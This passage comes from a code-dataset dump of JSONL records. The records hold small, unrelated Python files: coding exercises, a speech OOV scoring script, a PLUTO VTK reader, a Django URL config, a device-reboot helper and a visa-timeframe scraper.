int(candidate[underscores[2]+1:underscores[3]])\n\ttime_end = int(candidate[underscores[3]+1:candidate.index(\".\")])\n\tprint(filename + \" \" + str(time_start) + \" \" + str(time_end))\n#\t\t\tprint(\"USEK READY CALCULATION SCORE\")\n#\t\t\tusek_ready = 0\n#\t\t\tin_unk = 0\n\tall_ref_unks = ref_oov[ref_oov[:,0] == filename]\n\tprint(all_ref_unks)\n\tbiggest_intersection = 0\n\tfor i in range(0, len(all_ref_unks)):\n\t\tprint(\"hyp time: \" + str(time_start) + \" \" + str(time_end))\n\t\tref_start_time = int(all_ref_unks[i,1])\n\t\tref_end_time = int(all_ref_unks[i,2]) #ref_start_time + int(all_ref_unks[i,2])\n\t\tprint(\"ref time: \" + str(ref_start_time) + \" \" + str(ref_end_time))\n\t\tintersection_start = max(time_start, ref_start_time)\n\t\tintersection_end = min(time_end, ref_end_time)\n\t\tintersection_duration = intersection_end - intersection_start\n\t\tif (intersection_duration > biggest_intersection): \n\t\t\trecall = intersection_duration / (ref_end_time - ref_start_time)\n\t\t\tprecision = intersection_duration / (time_end - time_start)\n\t\t\tf_score = (2 * precision * recall) / (precision + recall)\n\t\t\tbiggest_intersection = intersection_duration\n\t\t\tprint(\"Biggest intersection: \" + str(biggest_intersection))\n\t\t\tbiggest_int_index = i\n\tif biggest_intersection > 0:\n\t\tref_oov[np.where(np.all(ref_oov==all_ref_unks[biggest_int_index,:],axis=1)),3] = '1'\n\telse:\n\t\tf_score = 0\n\ttotal_score = total_score + f_score\n#\ttotal_phone_string_duration = total_phone_string_duration + phone_string_duration - 1\n#pred = spl[4]\n\nzeros_unks = ref_oov[ref_oov[:,3] == '0']\nnum_unfound = len(zeros_unks)\nprint(\"UNFOUND OOVS: \" + str(num_unfound))\n#print(zeros_unks)\nprint(\"UNKS IN HYPOTHESIS: \" + str(total_unks))\n#print(\"AVERAGE PHONEME STRING DURATION: \" + str(float(total_phone_string_duration)/float(total_unks)))\nif total_unks == 0:\n\tav_score = 0\nelse:\n\tav_score = float(total_score)/(float(total_unks)+float(num_unfound))\n#\tprint(\"AVERAGE PHONEME STRING DURATION: \" + str(float(total_phone_string_duration)/float(total_unks)))\n#\nprint(\"average f_score: \" + str(av_score))\n","repo_name":"BUTSpeechFIT/OOV-recovery-in-hybrid-ASR-system","sub_path":"utils/oov_detection_score_all_paths_ttt.py","file_name":"oov_detection_score_all_paths_ttt.py","file_ext":"py","file_size_in_byte":4076,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"34481866364","text":"def solution(a, b):\n start = 0\n end = 0\n if(a==b):\n return a\n elif(a>b):\n start = b\n end = a\n else:\n start = a\n end = b\n \n answer = start\n \n while(start != end):\n start += 1\n answer += start\n\n return answer","repo_name":"LouisKimDev/CodeTest","sub_path":"프로그래머스/lv1/12912. 두 정수 사이의 합/두 정수 사이의 합.py","file_name":"두 정수 사이의 합.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32025616551","text":"# Uses python3\nimport sys\n\n\ndef fib_last_digit(n):\n if n <= 1:\n return n\n\n prev = 0\n cur = 1\n\n for _ in range(n - 1):\n prev, cur = cur % 10, (prev + cur) % 10\n\n return cur\n\n\ndef fibonacci_sum_quick(n):\n last = fib_last_digit((n + 2) % 60)\n\n if last == 0:\n return 9\n else:\n return last - 1\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n = int(input)\n print(fibonacci_sum_quick(n))\n","repo_name":"avmi/algorithmic-toolbox","sub_path":"week2_algorithmic_warmup/6_last_digit_of_the_sum_of_fibonacci_numbers/fibonacci_sum_last_digit.py","file_name":"fibonacci_sum_last_digit.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31726284166","text":"from string import ascii_lowercase\n\ndef characterFrequency(input):\n dictionary = {}\n for char in input:\n if char in dictionary:\n dictionary[char] += 1\n elif char != ' ':\n dictionary[char] = 1\n\n return dictionary\n\ndef uniqueDictionary(answers):\n temp = {}\n for char in ascii_lowercase:\n good = True\n for answer in answers[:-1]:\n if char not in answer:\n good = False\n\n if good:\n temp[char] = 1\n return temp\n\ndef countQuestions(questions):\n count = 0\n for question in questions:\n characterCount = characterFrequency(question)\n count += len(characterCount)\n\n return count\n\ndef countUniqueQuestions(questions):\n count = 0\n for question in questions:\n per_person = question.split(' ')\n answers = []\n for person in per_person:\n answers.append(characterFrequency(person))\n\n uniqueAnswers = uniqueDictionary(answers)\n count += len(uniqueAnswers)\n \n return count\n\n# Open data file and add data to list.\n# data_passport has each entry per passport.\ndata_file = open(\"advent_of_code_2020/day_6/data.dat\", \"r\")\ndata_raw = data_file.read().split('\\n')\n\n# Combine individual fields into passports.\nlast_i = 0\ndata_lines = []\nfor i in range(len(data_raw)):\n if data_raw[i] == '' or i==len(data_raw)-1:\n content = ''\n for j in range(last_i, i):\n content += data_raw[j] + ' ' \n\n data_lines.append(content)\n last_i = i+1\n\n## PART 1 ##\nprint(countQuestions(data_lines))\n\n## PART 2 ##\nprint(countUniqueQuestions(data_lines))","repo_name":"JustAdamHere/AdventOfCode2020","sub_path":"day_6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30637417894","text":"import matplotlib.pyplot as plt\nimport pandas.io.data as web\nimport datetime as dt\nimport pandas as pd\n\nfrom blvutils.finance import to_log_returns\n\n\nYESTERDAY = dt.datetime.today() - pd.DateOffset(days=1)\nSTART = YESTERDAY - pd.DateOffset(years=2)\n\n\ndef remove_consecutive_values(series):\n result = series.dropna()\n result[result.shift(1) == result] = None\n return result.dropna()\n\n\ndef get_benchmark_return(code=\"^SSMI\"): # pragma: no cover\n \"\"\"Adj Close = close price adjusted for dividends and splits\n\n \"\"\"\n sp500 = web.DataReader(name=code,\n data_source=\"yahoo\",\n start=START,\n end=YESTERDAY)\n result = to_log_returns(sp500['Adj Close'])\n return result.sum()\n\n\ndef plot_returns_with_signals(data, signals): # pragma: no cover\n fig = plt.figure()\n ax1 = fig.add_subplot(211, ylabel='ALPHA')\n cum_alpha = data['alpha'].cumsum()\n cum_alpha.plot(ax=ax1, color='b', lw=2.)\n\n buy = signals[signals == True]\n sell = signals[signals == False]\n\n ax1.plot(buy.index, cum_alpha[buy.index], '^', markersize=20, color='g')\n ax1.plot(sell.index, cum_alpha[sell.index], 'v', markersize=20, color='r')\n fig.set_size_inches(28, 35)\n plt.show()\n","repo_name":"matwrob/blvresearch","sub_path":"concat/signals/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1436418673","text":"#import time\n\nfrom meerkat.base import time, _struct_time, Base\n\n\nclass TimePiece(Base):\n \"\"\"Formatting methods for creating strftime compliant timestamps\n\n Data sources: 'local', 'rtc', 'gps', 'external'\n Data kinds: 'std_time', std_time_ms', 'iso_time', 'file_time', 'gps_location', 'external'\n \"\"\"\n def __init__(self, source='local', kind='std_time_ms', time_zone=None):\n\n super().__init__()\n\n self._import_error = []\n self._struct_time = _struct_time\n\n self.kinds_available = {'std_time': '%Y-%m-%d %H:%M:%S',\n 'std_time_ms': '%Y-%m-%d %H:%M:%S.%f',\n 'iso_time': '%Y-%m-%dT%H:%M:%S.%f%z',\n 'file_time': '%Y_%m_%d_%H_%M_%S',\n 'gps_location': 'NMEA RMC message format',\n 'external': 'external source'\n }\n self.source = None\n self.set_source(source)\n \n self.kind = kind\n self.time_format = None\n #self.set_format(kind)\n\n # optional timezone\n self._tz = None\n self.tz = time_zone\n\n # external hardware time sources, must be set after initialization\n self.rtc = None\n self.gps = None\n\n # external time string, generated by another instance or external source\n self._external_time = None\n\n @property\n def tz(self):\n return self._tz\n\n @tz.setter\n def tz(self, time_zone):\n if time_zone is None:\n self._tz = ''\n else: self._tz = time_zone\n\n def set_source(self, source):\n \"\"\"Override default time source\n Must be one of the following: 'local', 'rtc', 'gps', 'external'\n \"\"\"\n assert source in ['local', 'rtc', 'gps', 'external'], f'Source `{source}` not supported'\n self.source = source\n\n def set_kind(self, kind):\n \"\"\"Override default time output format. Must be one of the\n the following (from self.formats_available):\n 'std_time',\n 'std_time_ms',\n 'iso_time',\n 'file_time',\n 'gps_location',\n 'external' # time_format from external timepiece instance\n \"\"\"\n assert kind in self.kinds_available.keys(), f'Kind `{kind}` not supported'\n self.kind = kind\n self.time_format = self.kinds_available[kind]\n\n def set_time(self, time_str):\n \"\"\"Set the returned string formatted time manually. Used for shared\n timestamps. To be useful in post-collection analysis, set the format\n name with self.set_format to the same format as the input argument.\n\n Parameters\n ----------\n time_str : str, in one of the formats generated by this class, as\n listed by self.formats_available\n \"\"\"\n self._external_time = time_str\n\n def get_time(self):\n \"\"\"Get the time in a specific format. For creating a reproducible\n format citation based on the attributes of the TimeFormats class.\n\n Returns\n -------\n str, formatted current time based on input argument\n \"\"\"\n if self.source == 'external':\n return self._eternal_time\n if (self.source == 'gps') & (self.kind == 'gps_location'):\n return self.gps_location()\n if self.source == 'local':\n t = self._struct_time()\n if self.source == 'rtc':\n t = self.rtc_time()\n if self.source == 'gps':\n t = self.gps_time()\n\n _formats = {'std_time': '{:02d}-{:02d}-{:02d} {:02d}:{:02d}:{:02d}',\n 'std_time_ms': '{:02d}-{:02d}-{:02d} {:02d}:{:02d}:{:02d}.{:06}',\n 'iso_time': '{:02d}-{:02d}-{:02d}T{:02d}:{:02d}:{:02d}.{:06}' + self.tz,\n 'file_time': '{:02d}_{:02d}_{:02d}_{:02d}_{:02d}_{:02d}',\n }\n str_format = _formats[self.kind]\n return str_format.format(*t) # format doesn't like tuples, needs args\n\n def rtc_time(self):\n \"\"\"Get time from the DS3221 RTC\n\n Parameters\n ----------\n bus_n : int, I2C bus number to access the RTC on\n bus_addr : int, I2C bus address the RTC is at on the bus\n\n Returns\n -------\n RTC time in std_time format\n \"\"\"\n t = self.rtc.get_time()\n return t[0], t[1], t[2], t[3], t[4], t[5], 0\n\n def gps_location(self):\n \"\"\"Get NMEA RMC message from the PA1010D GPS\n\n Parameters\n ----------\n bus_n : int, I2C bus number to access the RTC on\n bus_addr : int, I2C bus address the RTC is at on the bus\n\n Returns\n -------\n GPS date, lat, lon and time in NMEA RMC format\n \"\"\"\n nmea_sentence = self.gps.get(nmea_sentences=['RMC'])[0]\n return nmea_sentence\n\n def gps_time(self, timeout=120):\n \"\"\"Get time from the PA1010D GPS\n\n Parameters\n ----------\n bus_n : int, I2C bus number to access the RTC on\n bus_addr : int, I2C bus address the RTC is at on the bus\n\n Returns\n -------\n RTC time in iso_time format\n \"\"\"\n t0 = time.time()\n while True:\n t1 = time.time()\n try:\n nmea_sentence = self.gps_location()\n nmea_sentence = nmea_sentence.split(',')\n t = nmea_sentence[1].split('.')[0]\n t_ms = nmea_sentence[1].split('.')[1]\n t = [t[:2], t[2:4], t[4:]]\n d = nmea_sentence[9]\n d = ['20' + d[4:], d[2:4], d[:2]]\n return d[0], d[1], d[2], t[0], t[1], t[2], t_ms\n except:\n if t1 - t0 > timeout:\n return 'gps_timeout'\n continue\n\n def external_time(self):\n \"\"\"Return a previously set external time. Useful for synchronizing\n timestamps between data sources\"\"\"\n return self._external_time\n","repo_name":"crdietrich/meerkat","sub_path":"meerkat/data/timepiece.py","file_name":"timepiece.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"41200743872","text":"\"\"\"Reboot a Google device.\"\"\"\nfrom googledevices.helpers import gdh_session\n\n\ndef reboot(host, loop):\n \"\"\"Reboot a Google device.\"\"\"\n\n async def reboot_device(host, loop):\n \"\"\"Reboot a Google Home unit.\"\"\"\n from googledevices.api.cast.settings import Settings\n\n async with gdh_session() as session:\n googledevices = Settings(host, loop, session)\n await googledevices.reboot()\n\n loop.run_until_complete(reboot_device(host, loop))\n","repo_name":"ludeeus/googledevices","sub_path":"googledevices/cli/commands/reboot.py","file_name":"reboot.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"68"} +{"seq_id":"6040566249","text":"import logging\nfrom .exception import GeometryException\nfrom .blank import BlankGeometry\nfrom .unipuck import Unipuck\nfrom .unipuck_calculator import UnipuckCalculator\n\n\nclass Geometry:\n \"\"\" Provides access to the various sample plate geometry classes.\n \"\"\"\n NO_GEOMETRY = BlankGeometry.TYPE_NAME\n UNIPUCK = Unipuck.TYPE_NAME\n\n TYPES = [NO_GEOMETRY, UNIPUCK]\n\n _MSG_NOT_IMPLEMENTED = \"Geometry Type '{}' not implemented\"\n _MSG_UNKNOWN = \"Unknown Geometry Type: '{}'\"\n\n @staticmethod\n def get_class(geo_name):\n \"\"\" Get the geometry class based on its name. \"\"\"\n if geo_name == Geometry.NO_GEOMETRY:\n return BlankGeometry\n elif geo_name == Geometry.UNIPUCK:\n return Unipuck\n else:\n Geometry._raise_unknown(geo_name)\n\n @staticmethod\n def calculate_geometry(geo_name, slot_centers):\n \"\"\" Create a geometry object of the specified type and calculate its layout based on the set of\n known slot positions.\"\"\"\n if geo_name == Geometry.NO_GEOMETRY:\n return BlankGeometry(slot_centers)\n elif geo_name == Geometry.UNIPUCK:\n calculator = UnipuckCalculator(slot_centers)\n geometry = calculator.perform_alignment()\n return geometry\n else:\n Geometry._raise_unknown(geo_name)\n\n @staticmethod\n def get_num_slots(geo_name):\n \"\"\" Get the number of slots that a particular geometry type contains. \"\"\"\n cls = Geometry.get_class(geo_name)\n return cls.NUM_SLOTS\n\n @staticmethod\n def _raise_not_implemented(geo_name):\n log = logging.getLogger(\".\".join([__name__]))\n log.debug(Geometry._MSG_NOT_IMPLEMENTED.format(geo_name))\n raise GeometryException(Geometry._MSG_NOT_IMPLEMENTED.format(geo_name))\n\n @staticmethod\n def _raise_unknown(geo_name):\n log = logging.getLogger(\".\".join([__name__]))\n log.debug(Geometry._MSG_UNKNOWN.format(geo_name))\n raise GeometryException(Geometry._MSG_UNKNOWN.format(geo_name))\n","repo_name":"DiamondLightSource/PuckBarcodeReader","sub_path":"dls_barcode/geometry/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"68"} +{"seq_id":"17552555679","text":"from django.urls import path,include\nimport views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.conf.urls import url\nfrom django.views.static import serve\nurlpatterns=[\n path('questions/',views.questions, name='questions'),\n path('my_questions/',views.my_questions, name='my_questions'),\n path('testsave/',views.testsave, name='testsave'),\n path('upload_file/',views.upload_file, name='upload_file'),\n path('download_file/',views.download_file, name='download_file'),\n url(r'^download_file/(?P.*)$',serve, {'document_root':settings.MEDIA_ROOT}),\n path('edit_questions//',views.edit_my_questions, name='edit_questions'),\n path('answers//',views.answers,name=\"answers\"),\n path('display_answers//',views.display_answers,name=\"display_answers\"),\n path('post/ajax/deletemypost',views.delete_my_post, name='deletemypost'),\n path('post/ajax/rateanswer',views.rate_answer, name='rateanswer'),\n path('get/ajax/check_ratingstatus',views.check_user_ratingstatus, name='check_ratingstatus'),\n path('get/ajax/search',views.search_result, name='search'),\n path('get/ajax/get_answer',views.get_answer, name='get_answer'),\n path('get/ajax/get_search_results',views.search_questions,name='get_search_results'),\n]\n\n\nif settings.DEBUG:\n urlpatterns+=static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n urlpatterns+=static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)","repo_name":"Rosella-n/resourcebank","sub_path":"resourcebank/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18441076253","text":"import cv2\nimport numpy as np\n\nimage = np.zeros((500, 500, 3), dtype=np.uint8)\n\n\ndef on_mouse(event, x, y, flags, userdata):\n if event == cv2.EVENT_LBUTTONDOWN:\n cv2.circle(image, (x, y), 5, (0, 0, 255))\n elif event == cv2.EVENT_MBUTTONDOWN:\n cv2.rectangle(image, (x - 5, y - 5), (x + 5, y + 5), (0, 255, 0), 3)\n\n\ncv2.namedWindow(\"image\")\ncv2.setMouseCallback(\"image\", on_mouse)\n\nwhile True:\n cv2.imshow(\"image\", image)\n\n if cv2.waitKey(100) == 27:\n break\n\ncv2.destroyAllWindows()\n","repo_name":"arafalski/Systemy-wizyjne","sub_path":"Lab3/mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70373495576","text":"import numpy as np\n# from vtk import vtkStructuredPointsReader\n# from vtk import vtkStructuredGridReader\nfrom vtk import vtkRectilinearGridReader\nfrom vtk.util import numpy_support as VN\nimport os\n\n\ndef pluto_vtk_to_numpy(filename, quantity_names, ordering):\n '''pluto_vtk_to_numpy(filename, quantity_names, ordering): \\\n loads a vtk as built by pluto \\\n (only for scalar output of quantities)\\\n and converts it to numpy array.\\\n \"ordering may be either \"C\" or \"F\"'''\n\n if (os.path.isfile(filename)):\n reader = vtkRectilinearGridReader()\n reader.SetFileName(filename)\n reader.ReadAllVectorsOn()\n reader.ReadAllScalarsOn()\n reader.Update()\n else:\n raise ValueError(\"File '\"+filename+\"' does not exist\")\n\n data = reader.GetOutput()\n\n dim = []\n for ii in data.GetDimensions():\n if ii > 1:\n dim.append(ii)\n\n x = VN.vtk_to_numpy(data.GetXCoordinates())\n y = VN.vtk_to_numpy(data.GetYCoordinates())\n z = VN.vtk_to_numpy(data.GetZCoordinates())\n\n u = []\n for qn in quantity_names:\n # I transform to numpy array the scalar/vector field (and reshape)\n u.append(VN.vtk_to_numpy(data.GetCellData().GetArray(qn)))\n\n # Number of cells per each dimension\n dim_cells = list(np.array(dim)-1)\n dim_quantity = dim_cells.copy()\n for ii in range(len(u)):\n try:\n dim_quantity.append(u[ii].shape[1])\n except IndexError:\n pass\n u[ii] = u[ii].reshape(dim_quantity, order=ordering).transpose()\n\n return u, x, y, z\n\ndef pluto_read_vtk_frame(pluto_dir, nframe=None, time=None, q_names=None):\n '''Reads a vtk dataframe which was written by pluto 4.2, only in non-vector mode.\n Returns a dictionary with the quantities, ND arrays of x,y,z positions and an int or a float\n containig the actual time and number of frame'''\n\n # Check if sim directory exists\n if not(os.path.isdir(pluto_dir)):\n raise ValueError(pluto_dir + ' is not a valid directory')\n\n vtklog_fi = os.path.join(pluto_dir,\"vtk.out\")\n nvtk, t_log, dt, nsteps, file_type, endianess, quantity_names = read_vtk_log(vtklog_fi)\n\n if nframe!=None and time==None:\n pluto_nframe = nframe\n idx = np.where(nvtk==nframe)[0]\n # Maybe this check is useless??\n # print(type(idx))\n if idx.size==0:\n raise ValueError(\"Frame {} not found in directory\".format(nframe)+\n \" \"+pluto_dir+\n \". Maybe vtk log file({}) is not up to date with the vtk files\".format(vtklog_fi)+\n \", or the vtk file is simply missing\")\n if len(idx)>1:\n print(\"More than one line in vtk.out for dump number {:d}\".format(nframe))\n print(\"I use the last one (i.e.: the line more down in the file)!\")\n idx = idx[-1]\n pluto_time = t_log[idx]\n elif nframe==None and time!=None:\n idx = np.argmin(np.abs(t_log-time))\n pluto_nframe = nvtk[idx]\n pluto_time = t_log[idx]\n else:\n raise ValueError(\"Specify either nframe or time, not both or none.\")\n\n # Names of the quantities (if not feeded as input)\n if q_names==None:\n # Use the names given by the log file (out/vtk.out)\n q_names = quantity_names[idx]\n\n # Path of the file to read\n vtk_basename = \"data.\"\n ordering = \"F\"\n vtk_finame = vtk_basename + '{:04d}.vtk'.format(pluto_nframe)\n vtk_fi = os.path.join(pluto_dir,vtk_finame)\n\n # Read\n u, x, y, z = pluto_vtk_to_numpy(vtk_fi, q_names, ordering)\n # Build the dictionary\n q = {q_names[ii]:u[ii] for ii in range(len(q_names))}\n\n return q, x, y, z, pluto_time, pluto_nframe\n\ndef read_vtk_log(vtklog_fi):\n '''Function to read pluto's vtk log files (vtk.out)'''\n\n with open(vtklog_fi) as log:\n lines = log.readlines()\n\n nvtk = []; t = []; dt = []; nsteps = []\n file_type = []; endianess = []\n quantity_names = []\n for line in lines:\n elements = line.strip().split()\n nvtk.append(int(elements[0]))\n t.append(float(elements[1]))\n dt.append(float(elements[2]))\n nsteps.append(int(elements[3]))\n file_type.append(elements[4])\n endianess.append(elements[5])\n quantity_names.append(elements[6:])\n\n return (np.array(nvtk),\n np.array(t),\n np.array(dt),\n np.array(nsteps),\n file_type,\n endianess,\n quantity_names)\n\nif __name__ == \"__main__\":\n pluto_vtk = '/home/ema/simulazioni/sims_pluto/I90/newtransp-rho20/out/data.0025.vtk'\n quantities = ['bx3']\n u, x, y, z = pluto_vtk_to_numpy(pluto_vtk, quantities, 'C')\n len(u)\n x.shape\n y.shape\n u[0].shape\n","repo_name":"emabre/plot_pluto","sub_path":"pluto_read_frm.py","file_name":"pluto_read_frm.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"34509481844","text":"from datetime import datetime, date, time, timedelta\n#from time import sleep\nimport time\n\nnow = datetime.now()\ntime_lapse = (now.second)\n\n#global seconds\n\ndef timer():\n global seconds\n seconds = 0 \n \n while seconds != 180:\n # Sleep for a minute\n time.sleep(1)\n # Increment the minute total\n seconds += 1\n print(seconds)\n counter()\n\n return seconds\n\ndef counter():\n \n if seconds <= 5:\n print (\"Hecho\")\n \n else:\n print(\"Reset\")\n reset()\n\ndef reset():\n global seconds\n seconds = 0\n\ntimer()\n","repo_name":"fabiankmilo/API-Flora","sub_path":"Temporizador.py","file_name":"Temporizador.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73228634455","text":"#import json\n#from openmtc_scl.serializer import JsonSerializer\nfrom openmtc.scl import UpdateRequestIndication\nfrom aplus import Promise\nfrom futile.logging import LoggerMixin\nfrom urlparse import ParseResult, urlparse, urlunparse\n\n\nclass PA_Activation(LoggerMixin):\n def __init__(self, config, logger):\n self.config = config\n self.logger = logger\n self.logger.info(\"enable activate is %s\" % self.config.get(\"enable_activate\"))\n self.logger.info(\"activate path is %s\" % self.config.get(\"activate_path\"))\n self.logger.info(\"activate payload is %s\" % self.config.get(\"activate_payload\"))\n\n def start(self):\n with Promise() as p:\n \n if self.config.get(\"enable_activate\") is True:\n\n from .client import XIXIntentClient\n fullpath = self.config[\"activate_path\"]\n# fullpath = \"intent://eu.fistar.sdcs\"\n parsed = urlparse(fullpath)\n request_indication = UpdateRequestIndication(path=\"/m2m\",\n resource=str(self.config[\"activate_payload\"]),\n content_type=\"application/json\")\n# request_indication.path = urlunparse(ParseResult(\"\", \"\", *parsed[2:]))\n client = XIXIntentClient(parsed.netloc, self.config[\"Issuer\"], self.logger, self.config[\"listenActions\"])\n p.fulfill(client.send_request_indication(request_indication))\n\n else:\n #p.reject(\"test_only enabled\")\n p.fulfill(None)\n return p\n","repo_name":"elastest/elastest-device-emulator-service","sub_path":"eds/FrontEnd/server/openmtc-server/src/openmtc_server/plugins/transport_android_intent/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"41664039931","text":"import json\r\nimport xml.etree.ElementTree as ET\r\nimport os\r\nfrom tqdm import tqdm\r\nfrom PIL import Image\r\nimages = []\r\nannotations = []\r\ncategories = [\r\n {'name':'paragraph', 'id': 1, 'supercategory': ''},\r\n {'name':'title', 'id': 2, 'supercategory': ''},\r\n {'name':'table', 'id': 3, 'supercategory': ''},\r\n {'name':'figure', 'id': 4, 'supercategory': ''},\r\n {'name':'plot', 'id': 5, 'supercategory': ''},\r\n {'name':'formula', 'id': 6, 'supercategory': ''},\r\n]\r\nanno_id = 0\r\nimage_id = 0\r\nfor i, fname in enumerate(tqdm(os.listdir('output/jsons'))):\r\n if True:\r\n fname = fname[:-5]\r\n f = json.load(open(f'output/jsons/{fname}.json', 'r'))\r\n image_id += 1\r\n img_info = {}\r\n imz = Image.open(f'output/images/{fname}.jpg')\r\n img_info['width'] = imz.size[0]\r\n img_info['height'] = imz.size[1]\r\n img_info['file_name'] = fname+'.jpg'\r\n img_info['id'] = image_id\r\n images.append(img_info)\r\n \r\n paras = []\r\n for _, para in enumerate(f['para']):\r\n if isinstance(para,list):\r\n paras.extend(para)\r\n else:\r\n paras.append(para)\r\n for _, para in enumerate(paras):\r\n annotation = {}\r\n if isinstance(para,list):\r\n print(para)\r\n anno_id += 1\r\n annotation['id'] = anno_id\r\n annotation['image_id'] = image_id\r\n annotation['bbox'] = (para['bbox'][0], para['bbox'][1], para['bbox'][2] - para['bbox'][0],para['bbox'][3] - para['bbox'][1])\r\n annotation['iscrowd'] = 0\r\n if para['component'] == 'paragraph':\r\n annotation['category_id'] = 1\r\n elif para['component'] == 'natural_image':\r\n annotation['category_id'] = 4\r\n elif para['component'] == 'plot':\r\n annotation['category_id'] = 5\r\n elif para['component'] == 'formula':\r\n annotation['category_id'] = 6\r\n elif para['component'] == 'title':\r\n annotation['category_id'] = 2\r\n elif para['component'] == 'table':\r\n annotation['category_id'] = 3\r\n annotations.append(annotation)\r\n else: pass\r\nres = {'images': images, 'annotations': annotations, 'categories': categories}\r\njson.dump(res, open('train.json','w'))\r\n","repo_name":"personwhofloat/SDL-Document-Image-Generation","sub_path":"data_manipulation/convert_to_coco.py","file_name":"convert_to_coco.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"21403726584","text":"__author__ = 'Martin'\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def getIntersectionNode(self, headA, headB):\n \"\"\"\n :type head1, head1: ListNode\n :rtype: ListNode\n \"\"\"\n l1 = 0\n l2 = 0\n p1 = headA\n p2 = headB\n while p1 is not None:\n l1 += 1\n p1 = p1.next\n while p2 is not None:\n l2 += 1\n p2 = p2.next\n dif = l1 - l2\n p1 = headA\n p2 = headB\n if dif < 0:\n while dif < 0:\n p2 = p2.next\n dif += 1\n if dif > 0:\n while dif > 0:\n p1 = p1.next\n dif -= 1\n\n while p1 is not None and p2 is not None:\n if p1 == p2:\n return p1\n p1 = p1.next\n p2 = p2.next\n\n return None\n#http://www.geeksforgeeks.org/write-a-function-to-get-the-intersection-point-of-two-linked-lists/","repo_name":"MartinTrojans/Leetcode-Python","sub_path":"intersection of two linked list.py","file_name":"intersection of two linked list.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15395399022","text":"import torch\n\n\npreds = torch.tensor(\n [[0.2, 0.3, 0.0, 0.7, 0.5], [0.1, 0.2, 0.3, 0.4, 0.5], [0.5, 0.2, 0.1, 0.8, 0.2]]\n)\ntargets = torch.tensor([3, 4, 1], dtype=torch.long)\n\nhot_targets = torch.nn.functional.one_hot(targets, num_classes=5).to(dtype=torch.float)\n\nweights = torch.tensor([1, 0.75, 0.2, 1, 0.1], dtype=torch.float)\n\nloss_function = torch.nn.functional.cross_entropy\n\nnum = loss_function(preds, targets)\n\nprint(f\"Loss for no weights normal: {num.item()}\")\n\nnum = loss_function(preds, hot_targets)\n\nprint(f\"Loss for no weights one hot: {num.item()}\")\n\nnum = loss_function(preds, targets, weights)\n\nprint(f\"Loss for weighted normal: {num.item()}\")\n\nnum = loss_function(preds, hot_targets, weights)\n\nprint(f\"Loss for weighted one hot: {num.item()}\")\n","repo_name":"maartenlb/solar-panel-supervision","sub_path":"utils/one_hot_loss_check.py","file_name":"one_hot_loss_check.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24056295235","text":"from pathlib import Path\nimport arrow\nimport re\nimport json\nimport requests\nfrom typing import Literal\n\n\nTimeframeName = Literal[\"creation\", \"review\", \"inquiry\"]\n\n\nPATTERNS: dict[TimeframeName, re.Pattern] = {\n \"creation\": re.compile(\n r\"Current case creation time frame: As of (?P\\d+-\\w+-\\d+), we are working on cases that were received from USCIS on (?P\\d+-\\w+-\\d+).\"\n ),\n \"review\": re.compile(\n r\"Current case review time: As of (?P\\d+-\\w+-\\d+), we are reviewing documents submitted to us on (?P\\d+-\\w+-\\d+).\"\n ),\n \"inquiry\": re.compile(\n r\"As of (?P\\d+-\\w+-\\d+), we are responding to inquiries received on (?P\\d+-\\w+-\\d+).\"\n ),\n}\nData = dict[TimeframeName, dict[str, int]]\n\n\nDATA_PATH = Path(\"data.json\")\nwith DATA_PATH.open() as data_file:\n data: Data = json.load(data_file)\n\n\nr = requests.get(\n \"https://travel.state.gov/content/travel/en/us-visas/immigrate/nvc-timeframes.html\"\n)\n\nfor timeframe_name, pattern in PATTERNS.items():\n timeframe_data = data[timeframe_name]\n match = pattern.search(r.text)\n if not match:\n continue\n as_of_date = arrow.get(match.group(\"as_of_date\"), \"D-MMM-YYYY\")\n latest_date = arrow.get(match.group(\"latest_date\"), \"D-MMM-YYYY\")\n\n timeframe_data[as_of_date.date().isoformat()] = (as_of_date - latest_date).days\n\nwith 